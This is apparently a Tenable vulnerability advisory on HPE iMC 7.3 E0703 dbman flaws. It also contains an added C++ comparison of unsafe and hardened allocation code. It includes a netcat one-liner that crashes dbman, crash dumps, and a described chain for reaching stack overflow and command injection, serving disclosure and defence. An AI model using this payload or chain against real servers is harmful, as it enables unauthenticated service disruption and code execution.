
HPE iMC 7.3 E0703 Multiple Vulnerabilities

Critical

Synopsis

Unauthenticated Remote Denial of Service (DoS)

The flaw exists in the CDataConnStreamQueueT::deal_msg method in dbman.exe where the C++ new operator is used to allocate memory with the allocation size specified by the attacker:

.text:0045AD95      mov     eax, dword ptr [ebp+var_first4bytes]; attacker-controlled
.text:0045AD98      add     eax, 1
.text:0045AD9B      push    eax                        ; unsigned int
.text:0045AD9C      call    [email protected]@Z              ; operator new[](uint)

The attacker can specify a large allocation size (e.g., 0xfffffff0) by sending the following data to dbman:

echo -ne '\xff\xff\xff\x00' | nc  2810

This causes the new operator to throw an exception:

0:005> g
(1b0c.1ab4): C++ EH exception - code e06d7363 (first chance)
(1b0c.1ab4): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=0257d7c8 ebx=00000021 ecx=00000003 edx=00000000 esi=7448c164 edi=00000218
eip=7629c1a2 esp=0257d7c8 ebp=0257d824 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000212
KERNELBASE!RaiseException+0x62:
7629c1a2 8b4c2454        mov     ecx,dword ptr [esp+54h] ss:002b:0257d81c=339b14f7
0:001> kb
 # ChildEBP RetAddr  Args to Child              
00 0257d824 7444df60 e06d7363 00000001 00000003 KERNELBASE!RaiseException+0x62
01 0257d85c 74453efd 0257d86c 7447d604 743f2a10 MSVCR90!_CxxThrowException+0x48 [f:\dd\vctools\crt_bld\self_x86\crt\prebuild\eh\throw.cpp @ 161] 
02 0257d878 0045ada1 ffffff01 45e63853 00000000 MSVCR90!operator new+0x64 [f:\dd\vctools\crt_bld\self_x86\crt\src\new.cpp @ 63] 
WARNING: Stack unwind information not available. Following frames may be wrong.
03 0257fd38 00461415 02320628 02320628 004c7144 dbman+0x5ada1
04 0257fd4c 70e7c3c9 00000218 00000054 00000000 dbman+0x61415

The dbman process does not appear to handle the exception, so the process terminates.
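As an added illustration, not code from the advisory or from HPE's dbman, the unchecked allocation pattern described above is shown beside a hardened version. The big-endian 4-byte length prefix and the 64 KiB message limit are assumptions.

```cpp
#include <cstdint>
#include <new>
#include <vector>

// Assumed upper bound on a message body this hypothetical service accepts.
static const uint32_t kMaxMsgLen = 64 * 1024;

// Reads the 4-byte length prefix as a big-endian value (assumption: network order).
static uint32_t read_len(const unsigned char* hdr) {
    return (uint32_t(hdr[0]) << 24) | (uint32_t(hdr[1]) << 16) |
           (uint32_t(hdr[2]) << 8)  |  uint32_t(hdr[3]);
}

// Unsafe pattern mirroring the advisory: the peer-supplied length plus one goes
// straight to new[]. A length of 0xffffffff wraps to 0, and an enormous length
// makes new[] throw std::bad_alloc, which is left unhandled for the caller.
bool deal_msg_unsafe(const unsigned char* hdr) {
    uint32_t n = read_len(hdr) + 1;     // no bounds check, may wrap to 0
    char* buf = new char[n];            // may throw std::bad_alloc
    delete[] buf;
    return true;
}

// Hardened version: validate the length before allocating, and treat an
// allocation failure as a rejected message rather than a fatal exception.
bool deal_msg_safe(const unsigned char* hdr) {
    uint32_t n = read_len(hdr);
    if (n > kMaxMsgLen) return false;   // rejects oversized and wrapping lengths
    try {
        std::vector<char> buf(n + 1);   // n + 1 cannot overflow after the check
        return !buf.empty();
    } catch (const std::bad_alloc&) {
        return false;                   // out of memory: drop the message, keep running
    }
}
```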

Incomplete Fixes for CVE-2019-5390 and CVE-2019-5391

The root cause of these vulnerabilities was not addressed in 7.3 E0703.

In exploitation scenarios, the attacker would first send a command 10018 (for dbman.conf variable injection) followed by a command 10000 (for dbman.conf reloading). This would be enough to trigger the stack overflow. However, with the command injection, an additional command 10002 would have to be sent to trigger a backup.

HPE iMC version 7.3 E0703 introduced changes that require commands 10000 and 10002 to be encrypted while still allowing an unencrypted command 10018. The attacker can still send a command 10018 to inject configuration variables into dbman.conf, but cannot send commands 10000 or 10002 without an encryption key.

However, the attacker can use the DoS vulnerability described above to kill the dbman process, forcing a restart. It has been observed that the restart happens automatically under imcsysdm.exe if the Intelligent Deployment Monitoring Agent has started (a likely production configuration). When dbman restarts with the modified dbman.conf containing a long BackHoseIp variable, a stack buffer overflow occurs. Additionally, the BackupTime and BackupTimeMinute variable values can be set in the 10018 request to schedule an automated backup, which is enough to trigger the command injection.

WinDbg output:

STATUS_STACK_BUFFER_OVERRUN encountered
(990.123c): Break instruction exception - code 80000003 (first chance)
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for dbman.exe - 
eax=00000000 ebx=00000001 ecx=76275108 edx=0000002b esi=00000000 edi=00000000
eip=7631d74a esp=0019a32c ebp=0019a3b4 iopl=0         nv up ei pl zr na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000246
KERNELBASE!UnhandledExceptionFilter+0x5a:
7631d74a cc              int     3
0:000> kb 
 # ChildEBP RetAddr  Args to Child              
00 0019a3b4 004a9859 004cb258 721993ca 8de66c35 KERNELBASE!UnhandledExceptionFilter+0x5a
WARNING: Stack unwind information not available. Following frames may be wrong.
01 0019a6e8 0044dabb 0019a97c 0019a97c 0019a998 dbman!std::_Init_locks::operator=+0xcd1
02 0019b068 41414141 41414141 41414141 41414141 dbman+0x4dabb
03 0019b06c 41414141 41414141 41414141 41414141 0x41414141
04 0019b070 41414141 41414141 41414141 41414141 0x41414141
...

The !exploitable WinDbg extension classifies the crash as exploitable:

0:000> .load msec.dll
0:000> !exploitable

!exploitable 1.6.0.0
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at KERNELBASE!UnhandledExceptionFilter+0x000000000000005a (Hash=0xdaf335ab.0xf6a1be01)

Corruption of the exception handler chain is considered exploitable

Solution

A solution is not yet available.

Disclosure Timeline

06/05/2019 - Vulnerabilities discovered.
06/11/2019 - Vulnerabilities disclosed to HPE security. 90-day date is 09/09/2019.
06/14/2019 - HPE replies with an encrypted message. Tenable can't decrypt it, and sends HPE their public key.
06/18/2019 - Tenable's PGP key expired 6/17. Sends updated key to HPE.
06/21/2019 - HPE says the wrong key was used to encrypt the original disclosure. They will resend their key. Additionally, they can't import our key.
06/24/2019 - Tenable resends PGP public key and asks for HPE's key.
06/25/2019 - HPE sends a new key.
06/25/2019 - Tenable sends the original disclosure using the new key.
06/26/2019 - HPE says they sent us the wrong key. Sends another key and asks us to use that one moving forward.
06/26/2019 - Tenable acknowledges. Asks if we need to resend the report using the new key.
06/26/2019 - HPE asks to resend with new key.
06/26/2019 - Tenable resends with new key.
06/27/2019 - HPE assigns case number PSRT110957 and will let us know the action plan.
07/16/2019 - Tenable asks for an update.
07/30/2019 - Tenable asks for an update.
08/02/2019 - HPE does not have a target release date yet.
08/26/2019 - Tenable asks for an update.
09/03/2019 - As a professional courtesy, Tenable will extend the disclosure date by 2 weeks. The new disclosure date is 09/23/2019.
09/17/2019 - Tenable asks if HPE has received our communications. Reminds HPE that disclosure date is less than a week away.

All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability.

Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order.

For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page.

If you have questions or corrections about this advisory, please email [email protected]
